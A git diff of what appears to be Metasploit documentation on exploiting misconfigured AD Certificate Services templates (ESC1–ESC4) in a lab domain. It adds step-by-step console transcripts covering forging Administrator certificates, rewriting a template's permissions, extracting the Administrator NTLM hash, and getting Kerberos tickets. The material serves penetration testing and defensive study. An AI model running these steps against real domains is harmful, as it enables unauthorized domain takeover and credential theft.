 Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf).
 In this paper Will Schroeder and Lee Christensen described 8 different domain escalation
 attacks that they found they could conduct via misconfigured certificate templates:

- ESC1 - Domain escalation via No Issuance Requirements + Enrollable Client
-  Authentication/Smart Card Logon OID templates + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+- ESC1 - Domain escalation via No Issuance Requirements + Enrollable Client Authentication/Smart Card Logon OID templates +
+  CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#using-the-esc1-vulnerability-to-get-a-certificate-as-the-domain-administrator]]
 - ESC2 - Domain escalation via No Issuance Requirements + Enrollable Any Purpose
  EKU or no EKU
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc2-to-gain-domain-administrator-privileges]]
 - ESC3 - Domain escalation via No Issuance Requirements + Certificate Request
  Agent EKU + no enrollment agent restrictions
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc3-to-gain-domain-administrator-privileges]]
 - ESC4 - Domain escalation via misconfigured certificate template access control
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc4-to-gain-domain-administrator-privileges]]
 - ESC5 - Domain escalation via vulnerable PKI AD Object Access Control
 - ESC6 - Domain escalation via the EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CAs + No
  Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates
@@ -68,8 +73,8 @@ post](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-servi
 - ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC
  interface is allowed due to lack of the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.

-Currently Metasploit only supports attacking ESC1 to ESC3. As such,
-this paper only covers exploiting ESC1 to ESC3 at this time.
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, and ESC4. As such,
+this page only covers exploiting ESC1 to ESC4 at this time.

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -91,7 +96,7 @@ certificates that are created using the vulnerable ESC2 certificate template
 will not work for domain authentication. This restriction does not apply for those
 certificates vulnerable to ESC2 which have the `Any Purpose` EKU applied to them.

-Finally, ESC3 is fairly similar to ESC2, however it differs in two ways: a different EKU
+Next, ESC3 is fairly similar to ESC2, however it differs in two ways: a different EKU
 is abused, and the attacker also needs to utilize two different misconfigured certificate
 templates in order to exploit the vulnerability. The EKU in question this time is the
 Certificate Request Agent EKU, aka OID 1.3.6.1.4.1.311.20.2.1, which allows one to enroll
@@ -129,6 +134,8 @@ Domain Controller (DC), and will run a set of LDAP queries to gather a list of c
 templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out
 which users or groups can use that certificate template to elevate their privileges.

+At this time, the module is capable of identifying techniques ESC1 through ESC3.
+
 Keep in mind though that there are two sets of permissions in play here though. There is one set of permissions on the CA server that control
 who is able to enroll in any certificate template from that server, and second set of permissions that control who is allowed to enroll in
 a specific certificate template, which is applied to the certificate template itself. Therefore, the module will also specify which users are
@@ -177,10 +184,10 @@ View the full module info with the info, or info -d command.

 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set DOMAIN DAFOREST
 DOMAIN => DAFOREST
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normal
-USERNAME => normal
-msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normaluser
-PASSWORD => normaluser
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set USERNAME normaluser
+USERNAME => normaluser
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set PASSWORD normalpass
+PASSWORD => normalpass
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
@@ -300,22 +307,40 @@ msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) >
 ```

-From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However, whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate tempalte. At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that useful for us.
+From the output above we can determine that the SubCA certificate template is vulnerable to several attacks. However,
+whilst the issuing CAs allow any authenticated user to enroll in this certificate, the certificate template permissions
+prevent anyone but Domain Administrators and Enterprise Admins from being able to enroll in this certificate template.
+At that point you probably don't need to elevate your privileges any higher, so this certificate template isn't that
+useful for us.

-Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their privileges.
+Moving onto the next certificate template we see that ESC1-Template is vulnerable to the ESC1 attack, has permissions on
+the template itself that allow for enrollment by any authenticated domain user, and has one issuing CA, daforest-WIN-
+BR0CCBA815B-CA, available at WIN-BR0CCBA815B.daforest.com, which allows enrollment by any authenticated user. This means
+that any user who is authenticated to the domain can utilize this template with a ESC1 attack to elevate their
+privileges.

-Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack. ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but vulnerable to ESC3_TEMPLATE_2 attacks.
+Looking at ESC2-Template we can see the same story however this time the template is vulnerable to an ESC2 attack.
+ESC3-Template1 is also the same but is vulnerable to ESC3_TEMPLATE_1 attacks, and ESC3-Template2 is the same but
+vulnerable to ESC3_TEMPLATE_2 attacks.

-We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.
+We also see that the User template is vulnerable to ESC3_TEMPLATE_2 attacks and the fact that it is enrollable from
+Domain Users and that daforest-WIN-BR0CCBA815B-CA allows enrollment in it by any authenticated user confirms the theory
+that this can be exploited by any authenticated attacker for an ESC3_TEMPLATE_2 attack.

-Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and who's issuing CA allows any authenticated user to request it.
+Another interesting one to note is the Machine template, which allows any domain joined computer to enroll in it, and
+who's issuing CA allows any authenticated user to request it.

-With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the `ipcr_cert` module to request certificates for authentication using the vulnerable certificate templates.
+With this we now have a list of certificates that can be utilized for privilege escalation. The next step is to use the
+`ipcr_cert` module to request certificates for authentication using the vulnerable certificate templates.

-## Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
-Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can. Luckly we can also do this with the `icpr_cert` module. We just need to also set the `ALT_UPN` option to specify who we would like to authenticate as instead. Note that this only works with ESC1 vulnerable certificate templates which is why we can do this here.
+# Using the ESC1 Vulnerability To Get a Certificate as the Domain Administrator
+Getting a certificate as the current user is great, but what we really want to do is elevate privileges if we can.
+Luckily we can also do this with the `icpr_cert` module. We just need to also set the `ALT_SID` and `ALT_UPN` options to
+specify who we would like to authenticate as instead. Note that this only works with certificate templates that are
+vulnerable to ESC1 due to having the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag set.

-If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can quickly set this up:
+If we know the domain name is `daforest.com` and the domain administrator of this domain is named `Administrator` we can
+quickly set this up:

 ```msf
 msf6 > use auxiliary/admin/dcerpc/icpr_cert
@@ -327,10 +352,12 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
 RHOSTS => 172.30.239.85
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
-SMBPass => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
-SMBUser => normal
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
+ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
 ALT_UPN => Administrator@daforest.com
 msf6 auxiliary(admin/dcerpc/icpr_cert) > run
@@ -338,6 +365,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run

 [*] 172.30.239.85:445 - Requesting a certificate...
 [+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
 [*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
 [*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216143830_default_unknown_windows.ad.cs_338144.pfx
 [*] Auxiliary module execution completed
@@ -368,10 +396,10 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Template
 CERT_TEMPLATE => ESC2-Template
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
-SMBPass => normaluser
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
-SMBUser => normal
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
 msf6 auxiliary(admin/dcerpc/icpr_cert) > show options

 Module options (auxiliary/admin/dcerpc/icpr_cert):
@@ -388,8 +416,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                         ploit-framework/wiki/Using-Metasploit
   RPORT          445                          yes       The target port (TCP)
   SMBDomain      DAFOREST                     no        The Windows domain to use for authentication
-   SMBPass        normaluser                   no        The password for the specified username
-   SMBUser        normal                       no        The username to authenticate as
+   SMBPass        normalpass                   no        The password for the specified username
+   SMBUser        normaluser                   no        The username to authenticate as


 Auxiliary action:
@@ -442,8 +470,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                         ploit-framework/wiki/Using-Metasploit
   RPORT          445                          yes       The target port (TCP)
   SMBDomain      DAFOREST                     no        The Windows domain to use for authentication
-   SMBPass        normaluser                   no        The password for the specified username
-   SMBUser        normal                       no        The username to authenticate as
+   SMBPass        normalpass                   no        The password for the specified username
+   SMBUser        normaluser                   no        The username to authenticate as


 Auxiliary action:
@@ -481,8 +509,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                            tasploit-framework/wiki/Using-Metasploit
   RPORT          445                             yes       The target port (TCP)
   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
-   SMBPass        normaluser                      no        The password for the specified username
-   SMBUser        normal                          no        The username to authenticate as
+   SMBPass        normalpass                      no        The password for the specified username
+   SMBUser        normaluser                      no        The username to authenticate as


 Auxiliary action:
@@ -521,18 +549,27 @@ We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket grant
 domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.

 # Exploiting ESC3 To Gain Domain Administrator Privileges
-To exploit ESC3 vulnerable templates we will use a similar process to ESC2 templates but with slightly different steps. First, lets return to the earlier output where we can find several templates that are vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other principals (such as users or computers).
+To exploit ESC3 vulnerable templates we will use a similar process to
+[[ESC2|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc2-to-gain-domain-administrator-privileges]] templates but
+with slightly different steps. First, let's return to the earlier output where we can find several templates that are
+vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this
+attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has
+the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other
+principals (such as users or computers).

-The second part of this attack will then require that we co-sign requests for another certificate using the certificate that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being vulnerable to the ESC3_TEMPLATE_2 attack.
+The second part of this attack will then require that we co-sign requests for another certificate using the certificate
+that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do
+this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being
+vulnerable to the ESC3_TEMPLATE_2 attack.

 The list of ESC3_TEMPLATE_1 vulnerable templates is pretty short and consists of a single template:
 - ESC3-TEMPLATE-1 - Vulnerable to ESC3_TEMPLATE_1 and allows enrollment via any authenticated domain user.

 ESC3_TEMPLATE_2 are more plentiful though and we can find a few that are of interest:
- SubCA - Again as mentioned earlier can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
+- SubCA - Again as mentioned earlier can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
 - ESC3-Template2 - Enrollable via any authenticated domain user.
 - User - Enrollable via any authenticated domain user.
- Administrator -  Can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
+- Administrator -  Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
 - Machine - No real overlap between Domain Computers and Authenticated Users I don't think?
 - DomainController - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.

@@ -572,10 +609,10 @@ Auxiliary action:

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
-SMBUser => normal
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
-SMBPass => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
 SMBDomain => DAFOREST
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
@@ -606,7 +643,7 @@ host  service  type           name             content               info
 msf6 auxiliary(admin/dcerpc/icpr_cert) >
 ```

-Next we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:
+Next, we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:

 ```msf
 msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
@@ -632,8 +669,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                            tasploit-framework/wiki/Using-Metasploit
   RPORT          445                             yes       The target port (TCP)
   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
-   SMBPass        normaluser                      no        The password for the specified username
-   SMBUser        normal                          no        The username to authenticate as
+   SMBPass        normalpass                      no        The password for the specified username
+   SMBUser        normaluser                      no        The username to authenticate as


 Auxiliary action:
@@ -684,8 +721,8 @@ Module options (auxiliary/admin/dcerpc/icpr_cert):
                                                            tasploit-framework/wiki/Using-Metasploit
   RPORT          445                             yes       The target port (TCP)
   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
-   SMBPass        normaluser                      no        The password for the specified username
-   SMBUser        normal                          no        The username to authenticate as
+   SMBPass        normalpass                      no        The password for the specified username
+   SMBUser        normaluser                      no        The username to authenticate as


 Auxiliary action:
@@ -713,46 +750,207 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
 We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
 domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.

-# Getting A Kerberos Ticket
-Once a certificate for a user has been claimed, that certificate can be used to issue a Kerberos ticket granting ticket
-(TGT) which in tern can be used to authenticate to services.
+# Exploiting ESC4 To Gain Domain Administrator Privileges
+To exploit ESC4, we will require an account with write privileges over a certificate template object in Active
+Directory. This involves finding an object with weak permissions defined within the `nTSecurityDescriptor` field. With
+this object identified, we can modify it to reconfigure the template to be vulnerable to another ESC technique.

-Ticket granting tickets can be requested using the [[kerberos/get_ticket|kerberos/get_ticket.md]] module by specifying
-the `CERT_FILE` option. Take the certificate file from the last stage of the attack and set it as the `CERT_FILE`.
-Certificates from Metasploit do not require a password, but if the certificate was generated from a source that added
-one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` datastore option to the Domain Controller, then
-run the `GET_TGT` action.
+First, we will use the `icpr_cert` module in an attempt to exploit ESC1 (by setting `ALT_UPN`). This fails because
+the `ESC4-Test` certificate template does not allow the certificate's subject name to be supplied in the request (the
+`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag is not set in the `msPKI-Certificate-Name-Flag` field).

 ```msf
-msf6 > use kerberos/get_ticket
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+CA => daforest-WIN-BR0CCBA815B-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC4-Test
+CERT_TEMPLATE => ESC4-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@daforest.com
+ALT_UPN => Administrator@daforest.com
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run 
+[*] Running module against 172.30.239.85

-Matching Modules
-================
+[-] 172.30.239.85:445 - There was an error while requesting the certificate.
+[-] 172.30.239.85:445 - Denied by Policy Module
+[-] 172.30.239.85:445 - Error details:
+[-] 172.30.239.85:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
+[-] 172.30.239.85:445 -   HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > 
+```

-   #  Name                                 Disclosure Date  Rank    Check  Description
-   -  ----                                 ---------------  ----    -----  -----------
-   0  auxiliary/admin/kerberos/get_ticket                   normal  No     Kerberos TGT/TGS Ticket Requester
+Next, we use the `ad_cs_cert_template` module to update the `ESC4-Test` certificate template. This process first makes a
+backup of the certificate data that can be used later. Next, the local certificate template data is read and used to
+update the object in Active Directory. The local certificate template data can be modified to set a custom security
+descriptor.

+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME normaluser
+USERNAME => normaluser
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD normalpass
+PASSWORD => normalpass
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-Test
+CERT_TEMPLATE => ESC4-Test
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE 
+ACTION => UPDATE
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true 
+VERBOSE => true
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 172.30.239.85

-Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/kerberos/get_ticket
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 172.30.239.85:389 Getting root DSE
+[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
+[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
+[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > 
+```

-[*] Using auxiliary/admin/kerberos/get_ticket
-msf6 auxiliary(admin/kerberos/get_ticket) > get_tgt rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_192.168.159.10_windows.ad.cs_287833.pfx
-[*] Running module against 192.168.159.10
+Now that the certificate template has been updated to be vulnerable to ESC1, then we can use the `previous` shortcut
+to switch back to the last module and reattempt to issue the certificate. This time, the operation succeeds.

-[*] 192.168.159.10:88 - Getting TGT for smcintyre@msflab.local
-[+] 192.168.159.10:88 - Received a valid TGT-Response
-[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_192.168.159.10_mit.kerberos.cca_566767.bin
+```msf
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > previous 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
+[*] 172.30.239.85:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > 
+```
+
+Finally, we switch back to the `ad_cs_cert_template` module to restore the original configuration. We do this by
+setting the local template data option `TEMPLATE_FILE` to the JSON file that was created by the previous run.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set TEMPLATE_FILE /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
+TEMPLATE_FILE => /home/smcintyre/.msf4/loot/20230505083802_default_172.30.239.85_windows.ad.cs.te_593597.json
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
+[*] Running module against 172.30.239.85
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 172.30.239.85:389 Getting root DSE
+[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
+[+] Read certificate template data for: CN=ESC4-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
+[*] Certificate template data written to: /home/smcintyre/.msf4/loot/20230505083942_default_172.30.239.85_windows.ad.cs.te_000095.json
+[+] The operation completed successfully!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
+```
+
+At this point the certificate template's configuration has been restored and the operator has a certificate that can be
+used to authenticate to Active Directory as the Domain Admin.
+
+# Authenticating With A Certificate
+Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take
+further actions once a certificate has been issued for a particular identity (such as a Domain Admin user).
+
+## Authenticating To Kerberos
+Certificates can be used to authenticate to Kerberos using the [[kerberos/get_ticket|kerberos/get_ticket.md]] module by
+specifying the `CERT_FILE` option. Take the certificate file from the last stage of the attack and set it as the
+`CERT_FILE`. Certificates from Metasploit do not require a password, but if the certificate was generated from a source
+that added one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` to the Domain Controller which is the
+Key Distribution Center (KDC) for the Active Directory environment.
+
+### Getting An NT Hash
+Certificates can be used to obtain the NTLM hash of an account with the PKINIT extension. To request the hash, set the
+action to `GET_HASH`.
+
+```msf
+msf6 auxiliary(admin/kerberos/get_ticket) > get_hash rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+[*] Running module against 172.30.239.85
+
+[+] 172.30.239.85:88 - Received a valid TGT-Response
+[*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_324339.bin
+[*] 172.30.239.85:88 - Getting NTLM hash for Administrator@daforest.com
+[+] 172.30.239.85:88 - Received a valid TGS-Response
+[*] 172.30.239.85:88 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230505094204_default_172.30.239.85_mit.kerberos.cca_031414.bin
+[+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) >
+```
+
+### Getting A Kerberos Ticket
+Certificates can be used to issue a Kerberos ticket granting ticket (TGT) which in turn can be used to authenticate to
+services such as HTTP, LDAP and SMB. Ticket granting tickets can be requested using the `GET_TGT` action.
+
+```msf
+msf6 auxiliary(admin/kerberos/get_ticket) > get_tgt rhosts=172.30.239.85 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_172.30.239.85_windows.ad.cs_287833.pfx
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:88 - Getting TGT for Administrator@daforest.com
+[+] 172.30.239.85:88 - Received a valid TGT-Response
+[*] 172.30.239.85:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/kerberos/get_ticket) > klist
 Kerberos Cache
 ==============
-host            principal               sname                             issued                     status  path
----            ---------               -----                             ------                     ------  ----
-192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-01-24 20:23:54 -0500  valid   /home/smcintyre/.msf4/loot/20230124202354_default_192.168.159.10_mit.kerberos.cca_566767.bin
+host           principal                   sname                             issued                     status  path
+----           ---------                   -----                             ------                     ------  ----
+172.30.239.85  Administrator@daforest.com  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-01-24 20:23:54 -0500  valid   /home/smcintyre/.msf4/loot/20230124202354_default_172.30.239.85_mit.kerberos.cca_566767.bin

 msf6 auxiliary(admin/kerberos/get_ticket) >
 ```

 Once the TGT has been issued, it can be seen in the output of the `klist` command. With the TGT saved, it will
 automatically be used in the future to request ticket granting services (TGS) for authentication to specific services.
+
+## Authenticating To LDAP
+Certificates can also be used to directly authenticate to LDAP using schannel. Metasploit modules that use the builtin
+LDAP library (including `auxiliary/gather/ldap_query`) offer this as an authentication option that can be enabled. To
+use schannel authentication a few options must be set.
+
+* `LDAP::Auth` -- must be set to `schannel`
+* `LDAP::CertFile` -- must be set to the PFX certificate file with which to authenticate
+* `SSL` -- must be set to `true` (`schannel` authentication is only compatible with TLS connections)
+
+```msf
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(gather/ldap_query) > set LDAP::Auth schannel
+LDAP::Auth => schannel
+msf6 auxiliary(gather/ldap_query) > set LDAP::CertFile /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+LDAP::CertFile => /home/smcintyre/.msf4/loot/20230505083913_default_172.30.239.85_windows.ad.cs_275324.pfx
+msf6 auxiliary(gather/ldap_query) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 auxiliary(gather/ldap_query) > enum_domain
+[*] Running module against 172.30.239.85
+
+[*] Discovering base DN automatically
+[+] 172.30.239.85:389 Discovered base DN: DC=daforest,DC=com
+[+] 172.30.239.85:389 Discovered schema DN: DC=daforest,DC=com
+DC=msflab DC=local
+==================
+
+ Name                       Attributes
+ ----                       ----------
+ lockoutduration            0:00:30:00
+ lockoutthreshold           0
+ maxpwdage                  42:00:00:00
+ minpwdage                  1:00:00:00
+ minpwdlength               7
+ ms-ds-machineaccountquota  10
+ name                       msflab
+ objectsid                  S-1-5-21-3402587289-1488798532-3618296993
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
@@ -176,7 +176,7 @@ git config commit.gpgsign true

 Developers tend to customize their own [git aliases] to speed up common commands, but here are a few common ones:

-```
+```ini
 [alias]
 # An easy, colored oneline log format that shows signed/unsigned status
 nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)<%aE>%Creset [%G?]'
@@ -216,9 +216,9 @@ We're excited to see your upcoming contributions of new modules, documentation,

